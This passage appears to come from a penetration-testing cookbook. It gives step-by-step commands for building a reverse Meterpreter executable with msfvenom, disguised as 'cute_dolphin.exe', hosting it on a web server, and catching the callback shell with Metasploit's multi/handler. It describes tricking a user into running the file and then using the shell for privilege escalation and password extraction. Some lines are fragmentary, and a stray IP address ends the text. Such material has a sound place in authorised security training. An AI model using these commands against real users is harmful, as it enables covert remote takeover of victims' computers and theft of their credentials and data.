When we do a client side attack, we have the ability to trick the user into executing programs and make those programs connect back to a controlling computer.
In this recipe, we will learn how to use Metasploit's msfvenom to create an executable program (reverse meterpreter shell) that will connect to our Kali computer, when executed, and give us the control of the user's computer.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4443 -f exe > cute_dolphin.exe
This will create a file named cute_dolphin.exe
, which is a reverse meterpreter shell; reverse means that it will connect back to us instead of listening for us to connect.
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.56.1 set lport 4443 set ExitOnSession false set AutorunScript post/windows/manage/smart_migrate exploit -j -z
As you can see, the LHOST and LPORT are the ones we used to create the .exe
file. This is the IP address and TCP port the program is going to connect to, so we will need to listen on that network interface of our Kali Linux and over that port.
service apache2 start
cp cute_dolphin.exe /var/www/html/
http://192.168.56.1/cute_dolphin.exe
.-j -z
options). Let's check our active sessions:sessions
-i
option with the number of sessions:sessions -i 1
sysinfo
shell
Msfvenom helps us create payloads from the extensive list of Metasploit's payloads and incorporate them into source code in many languages or create scripts and executable files, as we did in this recipe. The parameters we used here were the payload to use (windows/meterpreter/reverse_tcp
), the host and port to connect back (LHOST and LPORT), and the output format (-f exe
); redirecting the standard output to a file to have it saved as cute_dolphin.exe
.
The exploit/multi/handler module of Metasploit is a payload handler; in this case we used it to listen for the connection and after the connection was established, it ran the meterpreter payload.
Meterpreter is the Metasploit's version of a shell on steroids; it contains modules to sniff on a victim's network, to use it as a pivot point to access the local network, to perform privilege escalation and password extraction, and many other useful things when performing penetration tests.
3.142.171.253